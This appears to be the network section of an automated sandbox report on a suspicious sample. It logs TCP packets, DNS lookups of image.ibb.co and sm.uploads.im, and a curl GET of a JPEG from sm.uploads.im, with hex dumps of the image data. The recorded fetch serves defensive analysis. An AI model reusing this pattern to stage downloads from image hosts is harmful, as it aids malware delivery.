Aug 23, 2017 11:21:37.995614052 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.002895117 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.002918959 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.003099918 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.003123045 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.007617950 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.007800102 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.007817030 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.012399912 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.012425900 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.012706041 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.012727976 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.023327112 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.023349047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.023613930 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.023633003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.032605886 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.032620907 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.032979965 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.033010006 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.036457062 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.036470890 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.036475897 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.036801100 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.036829948 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.042865038 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.042879105 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.042896032 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.043083906 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.043122053 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.051196098 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.051215887 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.051410913 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.051448107 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.060533047 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.060548067 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.060739040 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.060776949 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.067110062 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.067123890 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.067325115 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.067362070 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.072345972 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.072359085 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.072559118 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.072596073 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.075428963 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.075442076 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.075625896 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.075664043 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.083127975 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.083340883 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.083378077 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.089122057 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.089358091 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.089394093 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.092524052 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.092715025 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.092751980 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.110043049 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.110291004 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.110331059 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.118227005 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.118248940 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.118458986 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.118499994 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.124912977 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.124927998 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.125124931 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.125163078 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.132553101 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.132565975 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.132704020 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.132735968 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.139761925 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.139775038 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.140012980 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.140053034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.160986900 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.161009073 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.161185026 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.161221981 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.167982101 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.168004990 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.168148041 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.168179989 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.168633938 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.168656111 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.169003963 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.169033051 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.182077885 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.182327032 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.182370901 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.195485115 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.195502043 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.195668936 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.195717096 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.200978041 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.201088905 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.201112032 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.211958885 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.211971045 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.212058067 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.212086916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.216873884 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.216886044 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.217009068 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.217050076 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.218832016 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.218846083 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.218961954 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.218997002 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.226661921 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.226677895 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.226833105 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.226871967 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.236542940 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.236558914 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.236696005 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.236727953 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.247704029 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.247720003 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.247849941 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.247901917 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.254456043 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.254472971 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.254569054 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.254605055 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.256594896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.256609917 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.256711006 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.256733894 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.272567034 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.272583008 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.272815943 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.272847891 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.278706074 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.278729916 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.278932095 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.278970957 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.281512022 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.281727076 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.281764984 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.295304060 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.295488119 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.295511007 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.296359062 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.296526909 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.296555996 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.303258896 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.303637981 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.303658009 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.307102919 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.307118893 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.307276964 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.307300091 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.311328888 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.311343908 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.311553955 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.311594009 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.317281961 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.317296028 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.317507029 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.317547083 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.322218895 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.322371006 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.322393894 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.327435017 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.327574015 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.327596903 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.327672958 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.327934980 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:38.327953100 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.528455019 MESZ	80	49196	104.24.116.148	192.168.1.16
Aug 23, 2017 11:21:38.528846025 MESZ	49196	80	192.168.1.16	104.24.116.148
Aug 23, 2017 11:21:47.398139000 MESZ	49196	80	192.168.1.16	104.24.116.148

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Aug 23, 2017 11:21:32.425781012 MESZ	61484	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:32.621227026 MESZ	53	61484	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:32.791610003 MESZ	54797	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:32.982661963 MESZ	53	54797	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:34.719229937 MESZ	58435	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:34.986608982 MESZ	53	58435	8.8.8.8	192.168.1.16
Aug 23, 2017 11:21:34.997807980 MESZ	51184	53	192.168.1.16	8.8.8.8
Aug 23, 2017 11:21:35.229789972 MESZ	53	51184	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 23, 2017 11:21:32.425781012 MESZ	192.168.1.16	8.8.8.8	0x82d8	Standard query (0)	image.ibb.co	A (IP address)	IN (0x0001)
Aug 23, 2017 11:21:32.791610003 MESZ	192.168.1.16	8.8.8.8	0xed55	Standard query (0)	image.ibb.co	A (IP address)	IN (0x0001)
Aug 23, 2017 11:21:34.719229937 MESZ	192.168.1.16	8.8.8.8	0x6af7	Standard query (0)	sm.uploads.im	A (IP address)	IN (0x0001)
Aug 23, 2017 11:21:34.997807980 MESZ	192.168.1.16	8.8.8.8	0x504a	Standard query (0)	sm.uploads.im	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Replay Code	Name	Address	Type	Class
Aug 23, 2017 11:21:32.621227026 MESZ	8.8.8.8	192.168.1.16	0x82d8	No error (0)	image.ibb.co	104.27.127.62	A (IP address)	IN (0x0001)
Aug 23, 2017 11:21:32.982661963 MESZ	8.8.8.8	192.168.1.16	0xed55	No error (0)	image.ibb.co	104.27.127.62	A (IP address)	IN (0x0001)
Aug 23, 2017 11:21:34.986608982 MESZ	8.8.8.8	192.168.1.16	0x6af7	No error (0)	sm.uploads.im	104.24.116.148	A (IP address)	IN (0x0001)
Aug 23, 2017 11:21:35.229789972 MESZ	8.8.8.8	192.168.1.16	0x504a	No error (0)	sm.uploads.im	104.24.116.148	A (IP address)	IN (0x0001)

HTTP Request Dependency Graph

sm.uploads.im

image.ibb.co

HTTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Header	Total Bytes Transfered (KB)
Aug 23, 2017 11:21:35.234725952 MESZ	49196	80	192.168.1.16	104.24.116.148	GET /X8IOl.jpg HTTP/1.1 Connection: Keep-Alive Accept: / Accept-Language: en-US User-Agent: curl/7.51.0 Host: sm.uploads.im	13
Aug 23, 2017 11:21:35.537159920 MESZ	80	49196	104.24.116.148	192.168.1.16	HTTP/1.1 200 OK Date: Wed, 23 Aug 2017 09:21:35 GMT Content-Type: image/jpeg Content-Length: 1040099 Connection: keep-alive Set-Cookie: __cfduid=dd243408c901a618043c5d5e65d5bbedb1503480095; expires=Thu, 23-Aug-18 09:21:35 GMT; path=/; domain=.uploads.im; HttpOnly Last-Modified: Wed, 09 Aug 2017 18:48:58 GMT ETag: "598b591a-fdee3" Expires: Fri, 22 Sep 2017 09:21:35 GMT Cache-Control: public, max-age=2592000 CF-Cache-Status: HIT Accept-Ranges: bytes Server: cloudflare-nginx CF-RAY: 392d00a41054729b-AMS Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff db 00 43 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 01 ff c0 00 11 08 04 38 07 80 03 01 11 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08 23 42 b1 c1 15 52 d1 f0 24 33 62 72 82 09 0a 16 17 18 19 1a 25 26 27 28 29 2a 34 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e1 e2 e3 e4 e5 e6 e7 e8 e9 ea f1 f2 f3 f4 f5 f6 f7 f8 f9 fa ff c4 00 1f 01 00 03 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 11 00 02 01 02 04 04 03 04 07 05 04 04 00 01 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fe 25 eb d8 3c 70 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 Data Ascii: JFIFCC8}!1AQa"q2#BR$3br%&'()456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyzw!1AQaq"2B#3Rbr$4%&'()56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?%<p((((((((((((((((((((((((((((((((((((((((((((	14
Aug 23, 2017 11:21:35.537192106 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 Data Ascii: (((((((((((((((((((((((((((((((((((	16
Aug 23, 2017 11:21:35.537208080 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 Data Ascii: ((((((((((	16
Aug 23, 2017 11:21:35.547652960 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 Data Ascii: (((((((((((((((((((((((((((((((((((	18
Aug 23, 2017 11:21:35.547678947 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 Data Ascii: ((((((((((((((((((((((((((((((((((	19
Aug 23, 2017 11:21:35.547699928 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 Data Ascii: (((((((((((((((((((((((((((((((((((	20
Aug 23, 2017 11:21:35.552057028 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 Data Ascii: (((((((((((((((((((((((((((((((((((	22
Aug 23, 2017 11:21:35.552087069 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 Data Ascii: (((((((((((((((((((((((((((((((((((	23
Aug 23, 2017 11:21:35.552098989 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 Data Ascii: (((((((((((((((((((((((((((((((((((	24
Aug 23, 2017 11:21:35.560952902 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 Data Ascii: (((((((((((((((((((((((((((((((((((	26
Aug 23, 2017 11:21:35.560988903 MESZ	80	49196	104.24.116.148	192.168.1.16	Data Raw: 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 a0 02 80 0a 00 28 00 Data Ascii: (((((((((((((((((((((((((((((((((((	27

HTTPS Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Subject	Issuer	Not Before	Not After	Raw
